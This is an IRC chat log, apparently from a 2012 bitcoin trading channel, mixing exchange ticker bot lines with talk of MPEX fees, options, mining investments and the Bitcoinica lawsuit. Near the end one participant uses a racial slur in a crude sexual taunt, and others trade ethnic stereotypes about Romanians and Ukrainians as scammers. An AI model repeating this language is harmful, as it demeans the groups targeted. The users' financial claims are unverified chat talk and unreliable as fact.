have an account on Mpex Aug 13 01:36:23 ... Aug 13 01:38:32 So ETF had 0.15 in revenue but paid 0.005 I see. Most is respent. Aug 13 01:38:33 [GLBSE] [BDT] 1 @ 1.093 BTC [-] Aug 13 01:39:01 [GLBSE] [NYAN.B] 5 @ 1 = 5 BTC [-] Aug 13 01:39:16 I was referring to the the purchase in my own issue by the way which happened just a bit before Aug 13 01:39:17 i think the revenue is mostly share appreciation Aug 13 01:39:31 I suppose Aug 13 01:39:46 whats that, jtme ? Aug 13 01:40:49 [GLBSE] [GIGAMINING] 1 @ 1.1399 BTC [+] Aug 13 01:41:04 [MPEX] [S.MPOE] 36262 @ 0.00035541 = 12.8879 BTC [+] Aug 13 01:41:05 [MPEX] [S.MPOE] 13738 @ 0.0003579 = 4.9168 BTC [+] Aug 13 01:42:06 [GLBSE] [BTC-MINING] 1 @ 1 BTC [+] Aug 13 01:42:30 [GLBSE] [MOVETO.FUND] 1 @ 1.07 BTC [+] Aug 13 01:42:48 jtme? Aug 13 01:43:03 Your asset on the glbse, it's BTC-MINING right? Aug 13 01:43:11 Yes Aug 13 01:43:28 I don't know, there's so many tickers I don't follow/watch on GLBSE Aug 13 01:43:38 [MPEX] [S.MPOE] 34456 @ 0.0003579 = 12.3318 BTC [+] Aug 13 01:43:39 Looking at it right now Aug 13 01:43:40 [MPEX] [S.MPOE] 68746 @ 0.00035873 = 24.6613 BTC [+] Aug 13 01:43:41 [MPEX] [S.MPOE] 16798 @ 0.00036042 = 6.0543 BTC [+] Aug 13 01:44:01 o i see, btc-mining. what's that, miner ? Aug 13 01:44:54 [GLBSE] [TYGRR.BOND-PI] 40 @ 1.6 = 64 BTC [-] Aug 13 01:45:50 Yes, quite simply mining it seems... look at that, JTME takes 25% of shares... + deducts all expenses before giving dividend Aug 13 01:45:54 or so says the contract Aug 13 01:46:01 [MPEX] [F.GIGA.ETF] 4800 @ 0.00111814 = 5.3671 BTC [-] Aug 13 01:46:02 [MPEX] [F.GIGA.ETF] 14423 @ 0.00109346 = 15.771 BTC [-] Aug 13 01:46:04 [MPEX] [F.GIGA.ETF] 8196 @ 0.00109056 = 8.9382 BTC [-] Aug 13 01:46:05 [MPEX] [F.GIGA.ETF] 9497 @ 0.00108947 = 10.3467 BTC [-] Aug 13 01:46:05 [MPEX] [F.GIGA.ETF] 8200 @ 0.00108065 = 8.8613 BTC [-] Aug 13 01:46:06 [MPEX] [F.GIGA.ETF] 2100 @ 0.00108064 = 2.2693 BTC [-] Aug 13 01:46:07 [MPEX] [F.GIGA.ETF] 3100 @ 0.00107599 = 3.3356 BTC [-] Aug 13 01:46:08 [MPEX] [F.GIGA.ETF] 3062 @ 0.00106874 = 3.2725 BTC [-] Aug 13 01:46:10 [MPEX] [F.GIGA.ETF] 1622 @ 0.00106793 = 1.7322 BTC [-] Aug 13 01:46:39 the reason i wouldnt put money in mining atm is that i imagine they will be hit by a double whammy of deprecviation Aug 13 01:46:48 from halving of block reward and from eventual asics Aug 13 01:47:08 same, but I do hold small amounts of some. Aug 13 01:48:04 i hold quite a few gigavps bonds but im hedged entirely, just the depositary. Aug 13 01:48:16 We're waiting for the ASICs Aug 13 01:48:58 i'd be more worried about december halving. i don't think at the curent bumbling pace the various companies will manage to deliver enough asics for diff to double Aug 13 01:49:08 but the halving is in writing. Aug 13 01:49:14 mircea_popescu: is there still a 20BTC fee to open an account with MPEX? I found someone with an account who would place orders there for me, but he wnated 10% roundtrip. Aug 13 01:49:34 there is, it's not going away Ignatius-otc1 Aug 13 01:49:46 if anything it will increase in time. i haven't yet because the btc doubled. Aug 13 01:50:00 Can you explain that or link me to the explanation for such a large fee? Aug 13 01:50:24 [MPEX] [S.BVPS] 371 @ 0.0034264 = 1.2712 BTC [-] Aug 13 01:50:26 [MPEX] [S.BVPS] 283 @ 0.00351528 = 0.9948 BTC [+] Aug 13 01:50:27 [MPEX] [S.BVPS] 1000 @ 0.0035919 = 3.5919 BTC [+] Aug 13 01:50:28 [MPEX] [S.BVPS] 72 @ 0.00359263 = 0.2587 BTC [+] Aug 13 01:50:28 [MPEX] [S.BVPS] 274 @ 0.003849 = 1.0546 BTC [+] Aug 13 01:50:46 what do you mean the explanation ? Aug 13 01:51:16 Sorry for my ignorance, but I currently trade on the GLBSE and there are no fees to have an account there. What is the purpose of the 20BTC fee for an account? Aug 13 01:51:29 i think it's pretty simple, on glbse you get free account and 1% fees round trip. on mpex you have to ante 20 btc and fee is .2% round trip. Aug 13 01:51:40 if you will trade less than about 2k btc you're better off on glbse Aug 13 01:51:44 ahh far lower fees, ok thanks Aug 13 01:51:48 if you'll trade more than 2,5k or so you're better off on mpex Aug 13 01:52:58 it's also the only place where you can trade options, the only place where you have margins, and i don't recall if transfers are still free or not on glbse, but anyway. Aug 13 01:53:17 0.2% xfer fee at glbse I think Aug 13 01:53:28 For assets only Aug 13 01:53:38 well on mpex it's free. Aug 13 01:53:57 o, yea, and you can also get margin (provided you're an established trader). Aug 13 01:54:15 what level of leverage? 4:1? Aug 13 01:54:36 it's not by rate, you get a fixed ammount. Aug 13 01:55:32 I would like options access but currently mpex is out of my budget. Hopefully in the future... Aug 13 01:55:55 im pretty certain it's not going anywhere. Aug 13 01:56:30 Bye the way, no one interested in giving perpetual loan to me for 0.5% weekly? I have very good backings eh Aug 13 01:56:41 size of loan? Aug 13 01:57:07 Eh, anywhere under 250 BTC Aug 13 01:57:21 Buying more asics or? Aug 13 01:57:34 mail order gf from the ukraine Aug 13 01:57:43 No, stricly for trading with the funds. Aug 13 01:57:47 in that case get a bulk discount and im in Aug 13 01:58:11 you know, MPBOR is like 4.9% atm Aug 13 01:58:17 Backed by my personal income and a larger amount of GLBSE assets Aug 13 01:58:21 you're better off putting your money there than hussling for .5 a week Aug 13 01:58:34 [GLBSE] [GIGAMINING] 1 @ 1.14 BTC [+] Aug 13 01:58:35 What is MPBOR? Aug 13 01:58:44 I got a 100 BTC loan for 0.1% a week ;) Aug 13 01:58:54 MPbond offered rate. Aug 13 01:59:27 Is that a pirate related bond mircea_popescu? Aug 13 01:59:31 srsly, read the explanation in that last link i put up Aug 13 01:59:35 [GLBSE] [OBSI.HRPT] 6 @ 0.1047 = 0.6282 BTC [+] Aug 13 01:59:42 in no way, Ignatius-otc1. it finances the options sold. Aug 13 01:59:49 ahh, ty Aug 13 02:00:07 [GLBSE] [RAREEARTH] 6 @ 0.00925001 = 0.0555 BTC [-] Aug 13 02:00:09 [GLBSE] [RAREEARTH] 1 @ 0.00925 BTC [-] Aug 13 02:00:22 http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 go there look for where it says "bonds" Aug 13 02:00:26 it's all explained. Aug 13 02:01:41 [GLBSE] [SILVER] 3 @ 0.00900001 = 0.027 BTC [-] Aug 13 02:02:20 [MPEX] [S.MPOE] 26395 @ 0.00036042 = 9.5133 BTC [+] Aug 13 02:02:22 [MPEX] [S.MPOE] 29300 @ 0.00036267 = 10.6262 BTC [+] Aug 13 02:02:53 You lend capital at a 2% premium? Aug 13 02:04:02 hm? Aug 13 02:05:24 Says there you're lending funds to MPOE for a 2% premium for the purpose of having the funds need for all ongoing open calls Aug 13 02:05:43 a a. normaly the options are financed by a sort of bond auction Aug 13 02:05:52 if there's not enough to fill in i step in and supply the capital. Aug 13 02:05:59 the limit was 2% but it was moved in may to 5% Aug 13 02:06:08 and i contemplate leaving it to freefloat. Aug 13 02:06:19 that would be interesting Aug 13 02:06:20 let the market price the bonds. Aug 13 02:06:36 i just want to do things smoothly so as not to shock the market. Aug 13 02:06:59 I'm just unfamilar with options to start with eh Aug 13 02:07:02 [GLBSE] [FOO.PPPPT] 2 @ 1.0402 = 2.0804 BTC [+] Aug 13 02:07:13 welllll... familiarize! :D Aug 13 02:07:14 [GLBSE] [NYAN.C] 1 @ 1 BTC [+] Aug 13 02:07:32 actually the girl did some nice write-ups back in the day, lemme find. Aug 13 02:08:29 Would help, will bookmark it for late perusal. Aug 13 02:08:37 [MPEX] [F.GIGA.ETF] 10200 @ 0.00106814 = 10.895 BTC [+] Aug 13 02:09:01 I'm a bit too sleepy on this Sunday evening to read about anything. Aug 13 02:09:06 [GLBSE] [NYAN.C] 3 @ 1 = 3 BTC [+] Aug 13 02:09:15 later* Aug 13 02:11:05 [GLBSE] [OBSI.HRPT] 7 @ 0.1047 = 0.7329 BTC [+] Aug 13 02:11:31 ;;later tell BTC-Mining https://bitcointalk.org/index.php?topic=67302.0 muahaha Aug 13 02:11:31 The operation succeeded. Aug 13 02:14:48 [GLBSE] [FOO.PPPPT] 4 @ 1.0403 = 4.1612 BTC [+] Aug 13 02:15:23 [MPEX] [O.HASH.P10TH] 114000 @ 0.02545034 = 2901.3388 BTC [+] Aug 13 02:16:00 Because I was already there Aug 13 02:17:13 Customer satisfaction on Silk Road is mostly positive, with a 97.8% positive feedback rate, although less than that on white market sites like Ebay, which boasts a positive feedback rate of 99%. Aug 13 02:17:17 very comparable items. Aug 13 02:18:21 [GLBSE] [GIGAMINING] 3 @ 1.14 = 3.42 BTC [+] Aug 13 02:18:50 Many ebay sellers manipulate their fb as if they drop below a certain % they could have their accounts temporarily denied selling rights. By having multiple accounts sellers can control their fb %. Aug 13 02:19:31 obviously. Aug 13 02:19:39 the metric is entirely fake. Aug 13 02:20:16 [GLBSE] [NYAN.C] 3 @ 1 = 3 BTC [+] Aug 13 02:20:26 [MPEX] [F.GIGA.ETF] 594 @ 0.00106814 = 0.6345 BTC [+] Aug 13 02:20:27 [MPEX] [F.GIGA.ETF] 700 @ 0.00108113 = 0.7568 BTC [+] Aug 13 02:20:28 [MPEX] [F.GIGA.ETF] 6464 @ 0.00114078 = 7.374 BTC [+] Aug 13 02:20:29 [MPEX] [F.GIGA.ETF] 15400 @ 0.0011431 = 17.6037 BTC [+] Aug 13 02:20:30 [MPEX] [F.GIGA.ETF] 13500 @ 0.00114584 = 15.4688 BTC [+] Aug 13 02:20:31 [MPEX] [F.GIGA.ETF] 6300 @ 0.0011497 = 7.2431 BTC [+] Aug 13 02:20:32 [MPEX] [F.GIGA.ETF] 7042 @ 0.00115139 = 8.1081 BTC [+] Aug 13 02:21:24 https://bitcointalk.org/index.php?topic=99222.0 o wow somebody actually sued bitcoinica. Aug 13 02:21:53 AS TO DEFENDANT BITCOINICA LP, ALSO KNOWN AS BITCOINICA BITCOINICA CONSULTANCY LTD INTERSANGO LTD. NORMAN, DONALD STRATEMAN, PATRICK TAAKI, AMIR DOES 1 THRU 100, INCL. SUMMONS ISSUED Aug 13 02:22:06 yes, old news Aug 13 02:22:09 [GLBSE] [OBSI.HRPT] 80 @ 0.1047 = 8.376 BTC [+] Aug 13 02:22:15 news to me i just heard about it Aug 13 02:22:56 [GLBSE] [OBSI.HRPT] 4 @ 0.1047 = 0.4188 BTC [+] Aug 13 02:27:54 [GLBSE] [GOLD] 15 @ 0.00920001 = 0.138 BTC [+] Aug 13 02:28:16 [GLBSE] [FPGAMINING] 2 @ 0.86 = 1.72 BTC [+] Aug 13 02:28:19 [GLBSE] [TYGRR.BOND-P] 4 @ 1.0398 = 4.1592 BTC [+] Aug 13 02:28:20 [GLBSE] [TYGRR.BOND-P] 6 @ 1.0399 = 6.2394 BTC [+] Aug 13 02:29:28 [GLBSE] [JTME] 3 @ 1 = 3 BTC [+] Aug 13 02:30:18 [GLBSE] [RAREEARTH] 6 @ 0.00924999 = 0.0555 BTC [-] Aug 13 02:30:42 [GLBSE] [NYAN.C] 70 @ 1 = 70 BTC [+] Aug 13 02:32:22 [GLBSE] [RAREEARTH] 6 @ 0.00925 = 0.0555 BTC [+] Aug 13 02:33:07 [GLBSE] [RAREEARTH] 1 @ 0.00925 BTC [+] Aug 13 02:36:49 cited for conversion, this is the real article. Aug 13 02:36:50 [MPEX] [S.MPOE] 3905 @ 0.00036353 = 1.4196 BTC [+] Aug 13 02:36:51 [MPEX] [S.MPOE] 22520 @ 0.0003442 = 7.7514 BTC [-] Aug 13 02:41:40 I didn't think bitcoinica was based udner sec regs? If so, huge derp on their part. Aug 13 02:42:39 well bitcoinica was something that's illegal since the 1930s Aug 13 02:42:52 back when it was owned by some chinese kid somewhere in taiwan or somesuch it was somewhat safe Aug 13 02:43:06 i don't understand what someone based in the us must have been thinking to get involved however. Aug 13 02:43:06 [GLBSE] [TYGRR.BOND-P] 2 @ 1.0389 = 2.0778 BTC [-] Aug 13 02:43:39 [GLBSE] [BITCOINMINV] 15 @ 0.125 = 1.875 BTC [+] Aug 13 02:43:56 [MPEX] [S.MPOE] 19038 @ 0.00036473 = 6.9437 BTC [+] Aug 13 02:44:29 mircea_popescu: the illegal aprt applies to regulated markets. For example, there is the retail foreign exchange amrket, unregulated, and bukcet shops are all voer the place. Aug 13 02:44:49 how many of these survived a day in court ? Aug 13 02:44:56 btc is also an unregulated market, afaik...but I personally wouldnt take on the risk of being a bitcoinica,unelss I based in tor maybe:P Aug 13 02:45:05 myea. kind of my point. Aug 13 02:46:59 [MPEX] [S.MPOE] 11408 @ 0.0003442 = 3.9266 BTC [-] Aug 13 02:47:00 [MPEX] [S.MPOE] 892 @ 0.00034116 = 0.3043 BTC [-] Aug 13 02:47:34 Has managing btc assets become a full time job for your mircea_popescu? Aug 13 02:48:00 for you* Aug 13 02:48:41 o, no. Aug 13 02:48:59 you know, it's funny... bitcoinica and mpoe were born like 2 weeks apart Aug 13 02:49:07 it'd have been their 1year bday this month. Aug 13 02:49:58 I made an account at bitcoinica but read of others experiencing faked market moves. I am familiar with them from chinese based forex bucket shops like cmsfx. I didn't get a coin deposited before they shut down. Aug 13 02:50:14 Do you have a normal day job? If so, what is it? If you don't mind me asking... Aug 13 02:50:40 Ignatius-otc i run my own company (polimedia srl), i am a business consultant. Aug 13 02:50:55 i also run romania's most widely read blog, an aggregator service that dominates that market Aug 13 02:50:58 and other things. Aug 13 02:51:12 [GLBSE] [MERGEDMINING] 5 @ 0.091 = 0.455 BTC [+] Aug 13 02:55:07 I have a microwave Aug 13 02:55:12 but that aside, i probably do manage more btc assets than most anyone. Aug 13 02:55:30 http://media.tumblr.com/tumblr_lsyez9IMC51qhoydp.gif \o/ Aug 13 02:56:12 I was productive yesterday...not yet today! Aug 13 02:56:19 hehe Aug 13 02:56:32 I'm lies really, working on supybot stuff \o/ Aug 13 03:02:27 [GLBSE] [NYAN.C] 8 @ 1 = 8 BTC [+] Aug 13 03:03:33 How much do you manage currently, mircea? Aug 13 03:04:14 [GLBSE] [FUTUREFUND] 60 @ 0.00011485 = 0.0069 BTC [+] Aug 13 03:05:46 [MPEX] [F.GIGA.ETF] 1800 @ 0.00113771 = 2.0479 BTC [-] Aug 13 03:06:19 mm, well the bonds report lists something like 6k or so ? Aug 13 03:06:30 [GLBSE] [FUTUREFUND] 7 @ 0.00011485 = 0.0008 BTC [+] Aug 13 03:06:36 if you look at the exhange address there's anything from 20 to 50k in there. Aug 13 03:06:49 then there's all the btc people on mpex put in, and all the respective shares Aug 13 03:07:00 and there's my own money... it comes to a decent chunk. Aug 13 03:07:15 eh, indeed Aug 13 03:07:37 if it's true what they say of pirate being over 1mn by now then that guy prolly beats me Aug 13 03:07:45 but i don't think that many more out there. maybe, who knows Aug 13 03:07:49 anon currency after all. Aug 13 03:08:07 zhou was prolly one at his zenith, unfortunately that didn't go over so well for him. Aug 13 03:08:27 mtgox from what i understand is losing money, but even so they prolly have more in cash. Aug 13 03:08:47 the sr guy supposedly clears 10-20 k a month, so that could be another. Aug 13 03:09:28 MtGox losing money? Aug 13 03:09:32 hmm Aug 13 03:09:34 that's what they say. Aug 13 03:09:46 and it kinda figures, tbh. the entire filing of paperwork thing is expensive. Aug 13 03:09:58 but iirc their last statement put them at -100k usd for the year. Aug 13 03:10:35 But they weren't around for long and bitcoin prices went up just last year Aug 13 03:10:53 The cost to get a secured platform developed and improved upon are high. Aug 13 03:10:54 mtgox !? they were around since day one lol, remember the first hack in btcworld ? Aug 13 03:11:29 Arf, that's misconstructed sentence Aug 13 03:12:25 They haven't been around with high bitcoins price for a long time Aug 13 03:12:51 well there was that time when it was 30+ Aug 13 03:12:55 but they didn't really have the volume back then Aug 13 03:13:01 since in the beggining the USD price of bitcoins were peanuts and volume was lower Aug 13 03:13:02 so ya maybe it looks better for them Aug 13 03:13:31 and they had to deal with security issue, remade the whole website to look and feel much better, etc. Aug 13 03:13:32 course i think trade volume is sticky in usd more than in btc. Aug 13 03:13:56 Lots of cost, they might have less costs from now on on that part and more profit from the higher volume at high prices Aug 13 03:14:04 let's do some math tho, at 2mn a month with a .5% fee they clear 10k btc which is 120k usd a month Aug 13 03:14:10 that's payroll for 2 people but not 20 Aug 13 03:14:17 and i tihnk they're closer to 20 and also, have investment. Aug 13 03:14:47 2 million a month with thoses fees x 2 Aug 13 03:14:48 that's the main difference, i fully financed both mpoe and its morphing into mpex, not having investors aboard helps tons your position later Aug 13 03:14:52 for buyer + for seller Aug 13 03:14:55 if you know about start-ups you know what i mean. Aug 13 03:15:43 [GLBSE] [PUREMINING] 1 @ 0.15439999 BTC [+] Aug 13 03:15:44 well ya 2x, but they also have to pay servers and whatnot. im just saying a coupla mn usd yearly revenue isn't HUGE. it's a small business. Aug 13 03:16:03 Indeed Aug 13 03:16:16 posh corner coffeeshop in busy metropolitan area style small busines.s Aug 13 03:16:17 But all bitcoins businesses are small, just like bitcoin economy Aug 13 03:16:23 yet, yeah. Aug 13 03:16:29 MtGox is huge on that scale Aug 13 03:16:34 then again, if i manage to get deliverable options already on something that will change. Aug 13 03:17:23 course... it doesn't looks like it wants to happen ;/ Aug 13 03:18:38 [MPEX] [S.MPOE] 17799 @ 0.00034116 = 6.0723 BTC [-] Aug 13 03:18:40 [MPEX] [S.MPOE] 33201 @ 0.00033748 = 11.2047 BTC [-] Aug 13 03:19:15 [GLBSE] [NYAN.C] 9 @ 1 = 9 BTC [+] Aug 13 03:24:19 [GLBSE] [BITCOINMINV] 50 @ 0.125 = 6.25 BTC [+] Aug 13 03:30:33 Cartmell was invited to testify before the United States senate in regards to Internet Governance by ICANN, is the inventor of five issued U.S. patents, led the successful battle against Hormel for the right to include the word "Spam" in trademarks that relate to email services, and is a major shareholder and board member of companies ranging from digital payment services to all-natural zero calorie sodas. Aug 13 03:30:40 THAT Cartmell is sueing intersango ? Aug 13 03:30:41 o boy. Aug 13 03:32:16 [GLBSE] [OBSI.HRPT] 90 @ 0.1047 = 9.423 BTC [+] Aug 13 03:33:00 [GLBSE] [NASTY] 3 @ 0.57 = 1.71 BTC [+] Aug 13 03:33:19 [GLBSE] [NASTY] 1 @ 0.58 BTC [+] Aug 13 03:34:09 [GLBSE] [NASTY] 6 @ 0.59 = 3.54 BTC [+] Aug 13 03:35:01 ... link? Aug 13 03:35:27 http://www.cartmell.co.nz/ Aug 13 03:36:02 something tells me this is the end of intersango and the named individuals. Aug 13 03:39:17 Can I get any reputable sources telling me that story again or should I just trust his own personal websites... Aug 13 03:39:31 which story ? Aug 13 03:39:52 Well all the story about him Aug 13 03:40:00 i don't know the guy personally but i know of him Aug 13 03:40:06 specifically the hormel spam case. Aug 13 03:40:25 now if its the same cartmell im not so sure, but if it is guy's a pitbulldogorca. Aug 13 03:42:02 Yea i suppose so, but since there seem to be a lot of people complaining about funds being stuck in intersango i have the feeling they will never get it back now that this is going on. Aug 13 03:42:02 Just hoping it won't cause many more people losses. Aug 13 03:42:14 wait, WHAT ? were there many complaints of stuck funds ?! Aug 13 03:42:57 [MPEX] [S.MPOE] 13576 @ 0.00036473 = 4.9516 BTC [+] Aug 13 03:42:59 [MPEX] [S.MPOE] 29573 @ 0.000365 = 10.7941 BTC [+] Aug 13 03:43:39 [MPEX] [S.MPOE] 24599 @ 0.00033748 = 8.3017 BTC [-] Aug 13 03:43:41 [MPEX] [S.MPOE] 37893 @ 0.00033502 = 12.6949 BTC [-] Aug 13 03:43:41 [MPEX] [S.MPOE] 37508 @ 0.000335 = 12.5652 BTC [-] Aug 13 03:44:05 [GLBSE] [OBSI.HRPT] 20 @ 0.102 = 2.04 BTC [-] Aug 13 03:44:07 [GLBSE] [OBSI.HRPT] 20 @ 0.1011 = 2.022 BTC [-] Aug 13 03:44:07 [GLBSE] [OBSI.HRPT] 40 @ 0.10100001 = 4.04 BTC [-] Aug 13 03:48:52 We'd hoped that our offer would both push Bitcoinica to resolve the claims faster, and give them more room for error. If they resolved all the claims within 6 months and paid us an equal pro rata share, they'd have immunity from us. Coincidentally, the amount of funds stolen only 2 days after this offer was made was nearly 100% of what we were owed at the time. Aug 13 03:49:05 ok, this is seriously conspiracy to defraud, this may yet result in jail time. Aug 13 03:50:09 [GLBSE] [BITCOINMINV] 1 @ 0.125 BTC [+] Aug 13 04:01:54 [GLBSE] [FUTUREFUND] 100 @ 0.00011485 = 0.0115 BTC [+] Aug 13 04:01:55 [GLBSE] [NYAN.C] 6 @ 1 = 6 BTC [+] Aug 13 04:04:16 [GLBSE] [FUTUREFUND] 65 @ 0.00011485 = 0.0075 BTC [+] Aug 13 04:05:23 [MPEX] [S.BVPS] 700 @ 0.00341166 = 2.3882 BTC [-] Aug 13 04:07:59 mircea_popescu: ? Aug 13 04:07:59 [MPEX] [S.MPOE] 47133 @ 0.000365 = 17.2035 BTC [+] Aug 13 04:08:11 was earlier a discussion about mpoe.etf Aug 13 04:08:46 ah, too bad i missed it, but my logs are iffy about that time... i've had diablo on ignore Aug 13 04:09:09 was just discussing with BTC-Mining the original etf value, it went out at .1 didnt it ? Aug 13 04:09:22 yup Aug 13 04:11:11 [GLBSE] [BIB.PIRATE] 1 @ 1.03999972 BTC [+] Aug 13 04:12:12 [GLBSE] [ASICMINER] 8 @ 0.1 = 0.8 BTC Aug 13 04:13:03 [GLBSE] [BIB.PIRATE] 1 @ 1.045 BTC [+] Aug 13 04:13:33 How long ago was that? Aug 13 04:14:06 BTC-Mining: march, iirc, let me verify Aug 13 04:14:48 BTC-Mining: https://bitcointalk.org/index.php?topic=67535.0 first post march 6 Aug 13 04:19:12 to be perfectly fair tho, that was capital raised to participate in the risky stock allocation at the time Aug 13 04:19:34 (wherein a specified block was put up and anyone could deposit btc for a set time, after which shares were distributed proportionally) Aug 13 04:19:52 that ran for march and april iirc. Aug 13 04:20:08 yeah, i think the etf got in on only one round Aug 13 04:20:21 o, was it february and march ? Aug 13 04:21:28 at .1? It's gone up by 1000% in 5 months? Aug 13 04:21:46 mircea_popescu: http://blockchain.info/tx-index/3622733/8d6c3595f76d101003b1c09810d2b0f5108ea2952cdf873e460fe94049143c2c Aug 13 04:21:58 mpoe.etf's 'subscription' Aug 13 04:22:00 yup 1mn offered in feb and 4mn offered in march you're right. Aug 13 04:22:21 wasn't it trading at 1.5 earlier ? Aug 13 04:23:22 i think it did trade at 1.5 Aug 13 04:23:30 best ask is 1.9 right now Aug 13 04:23:32 1500% beotch :D Aug 13 04:23:35 ohoho wtf. Aug 13 04:23:43 what's going on over there Aug 13 04:23:53 best bid is 1.5 Aug 13 04:24:08 no wait. wait wait. how many shares it holds again ? Aug 13 04:24:13 4mn what exactly ? Aug 13 04:24:21 probably just too few people selling Aug 13 04:24:40 mircea_popescu: sec, i'll get the exact # Aug 13 04:24:41 there was a wall up Aug 13 04:25:54 4`073`981, I unfortunately missed that excellent buy opportunity earlier Aug 13 04:26:41 .py 0.00036500 * 4073981 / 1000 Aug 13 04:26:42 1.487003065 Aug 13 04:26:49 a, so it's about right then huh Aug 13 04:27:47 mircea_popescu: we have about 21 in btc too Aug 13 04:28:01 iirc Aug 13 04:28:12 o, you retain cash ? Aug 13 04:28:34 some, to have buy orders placed to catch dips Aug 13 04:29:02 apparently no dips. you plan FAILS Aug 13 04:29:51 mircea_popescu: didn't it drop to 0.00010000 before this recent spurt? Aug 13 04:30:32 for like a minute yeh Aug 13 04:30:54 theres a long tail on the chart for sure. Aug 13 04:32:00 mircea_popescu: yeah, i meant to have a buy in there to catch those sort of things :/ Aug 13 04:32:12 lol woulda been crazy for nav if you managed to pick up some 1/3 price s.mpoe Aug 13 04:32:19 [GLBSE] [BMMO] 1 @ 0.10899699 BTC [+] Aug 13 04:33:05 mircea_popescu: i would've looked like a bonafide geenass Aug 13 04:33:25 lol Aug 13 04:33:29 [MPEX] [S.MPOE] 25429 @ 0.00036527 = 9.2885 BTC [+] Aug 13 04:33:30 [MPEX] [S.MPOE] 61100 @ 0.00036597 = 22.3608 BTC [+] Aug 13 04:33:32 [MPEX] [S.MPOE] 25700 @ 0.00036856 = 9.472 BTC [+] Aug 13 04:33:32 [MPEX] [S.MPOE] 32892 @ 0.00037361 = 12.2888 BTC [+] Aug 13 04:33:33 [MPEX] [S.MPOE] 11800 @ 0.00037375 = 4.4103 BTC [+] Aug 13 04:33:34 [MPEX] [S.MPOE] 33400 @ 0.00037489 = 12.5213 BTC [+] Aug 13 04:33:35 ciuciu: didn't he go bankrupt a few times too? Aug 13 04:33:36 [MPEX] [S.MPOE] 52933 @ 0.00037491 = 19.8451 BTC [+] Aug 13 04:33:37 [MPEX] [S.MPOE] 14500 @ 0.0003752 = 5.4404 BTC [+] Aug 13 04:33:38 [MPEX] [S.MPOE] 19600 @ 0.00037584 = 7.3665 BTC [+] Aug 13 04:33:39 [MPEX] [S.MPOE] 43111 @ 0.00037767 = 16.2817 BTC [+] Aug 13 04:33:40 [MPEX] [S.MPOE] 5000 @ 0.00037812 = 1.8906 BTC [+] Aug 13 04:33:41 [MPEX] [S.MPOE] 34500 @ 0.000379 = 13.0755 BTC [+] Aug 13 04:33:41 [MPEX] [S.MPOE] 46800 @ 0.00038002 = 17.7849 BTC [+] Aug 13 04:33:42 [MPEX] [S.MPOE] 13600 @ 0.00038122 = 5.1846 BTC [+] Aug 13 04:33:43 [MPEX] [S.MPOE] 64400 @ 0.00038154 = 24.5712 BTC [+] Aug 13 04:33:44 [MPEX] [S.MPOE] 900 @ 0.00038241 = 0.3442 BTC [+] Aug 13 04:33:45 [MPEX] [S.MPOE] 10500 @ 0.00038312 = 4.0228 BTC [+] Aug 13 04:33:46 [MPEX] [S.MPOE] 3835 @ 0.00038561 = 1.4788 BTC [+] Aug 13 04:33:52 who went bankrupt ? Aug 13 04:34:08 mircea_popescu: i heard some biz you ran went bankrupt Aug 13 04:34:15 ahaha ? no ? Aug 13 04:34:15 coulda just been fud tho Aug 13 04:34:25 it never happened, no. Aug 13 04:34:52 is that little shit ciuciu spreading crap ? Aug 13 04:34:59 dumbass wannabe romanian scammers, he's on my ignore. Aug 13 04:35:12 every day some nut coming up with brilliant ideeas. Aug 13 04:35:30 I though romania existed to scam the internet? Aug 13 04:35:33 * lonely_ (59cca34d@gateway/web/freenode/ip.89.204.163.77) has joined #bitcoin-otc-eu Aug 13 04:35:33 can i get some btc with my mastercard? i can provide documents that im the cardholder, but i need btc very quick Aug 13 04:35:33 nope. Aug 13 04:35:33 mircea trimite un msg pe privat Aug 13 04:35:33 * SaLoMoN has quit (Ping timeout: 246 seconds) Aug 13 04:35:33 O_o Aug 13 04:35:33 * kakobreklaa is now known as kakobrekla Aug 13 04:35:33 * lonely_ has quit (Quit: Page closed) Aug 13 04:35:33 you can prolly safely ban that entire C class for carding. Aug 13 04:35:38 [GLBSE] [OBSI.HRPT] 100 @ 0.1047 = 10.47 BTC [+] Aug 13 04:35:40 that from -otc-eu like a coupla hours ago. Aug 13 04:36:17 [GLBSE] [OBSI.HRPT] 30 @ 0.1047 = 3.141 BTC [+] Aug 13 04:36:18 dub i know ukraine exists for spamming, but romania is supposedly cleanning up. Aug 13 04:36:43 it was certainly a big player when I cared about network abuse Aug 13 04:38:06 Assuming someone is registering for him so he has private whois... that would be quite acceptable... Aug 13 04:38:24 whois doesn't always display the actual owner of the domain. Aug 13 04:38:38 Anonymous whois is good Aug 13 04:38:44 Fuck public whois Aug 13 04:38:54 what happened with namecoin btw ? dead ? Aug 13 04:39:16 ciuciu: have you seen my identification? Aug 13 04:39:18 [GLBSE] [NYAN.C] 56 @ 1 = 56 BTC [+] Aug 13 04:39:18 My whois is always public Aug 13 04:39:27 heh mine too Aug 13 04:39:38 Mine too, my real name is Sonic TheHedgehog and I live in Pyongyang KP Aug 13 04:39:41 fuh reelz Aug 13 04:39:59 are the korean hos as hot as vragnaroda says ? Aug 13 04:40:05 Yes Aug 13 04:40:25 Having said that, the Romanian ones aren't bad either :D Aug 13 04:40:29 Hahahahahaha cartmell is on the case theyre fucked Aug 13 04:40:37 ciuciu: well, if you read about mircea, i should be a small footnote somewhere Aug 13 04:40:46 aha! is it THE cartmell tsukino ? i was saying earlier... Aug 13 04:40:51 They would have faired better to hire me as an arbitrator Aug 13 04:40:56 imo identity is overrated Aug 13 04:41:26 Luceo what if you find your gf banging two big niggers Aug 13 04:41:29 Luceo: out of curiosity, what are your thoughts on property? Aug 13 04:41:39 and when you show up she looks all confused and says wel... she thought it was you ? Aug 13 04:41:39 Even if I know someone's real name, I'm not going to travel half the world to sue someone for $1k or something Aug 13 04:41:40 [MPEX] [S.MPOE] 8800 @ 0.00038561 = 3.3934 BTC [+] Aug 13 04:41:53 smickles: Property is essential to a free society :P Aug 13 04:42:06 there's either anon or property. pick one. Aug 13 04:42:19 ciuciu: not really Aug 13 04:42:38 nope Aug 13 04:42:43 I don't care about anonymity, I don't think anyone is more trustworthy because I know their name or what they look like Aug 13 04:42:52 that's valid Aug 13 04:42:56 tho i tend to trust otc ratings Aug 13 04:43:00 People are trustworthy based on joint connections, history etc Aug 13 04:43:06 Whether anonymous or validated Aug 13 04:43:08 eexactly. Aug 13 04:43:18 By the way romanian people are very cool. A romanian physicist worked with my father to develop the world's first nuclear battery Aug 13 04:43:22 course wot for instance is pseudonymous not anon. big difference. Aug 13 04:43:34 he was a kind and gentle man, very smart hehe Aug 13 04:43:43 Maybe there's 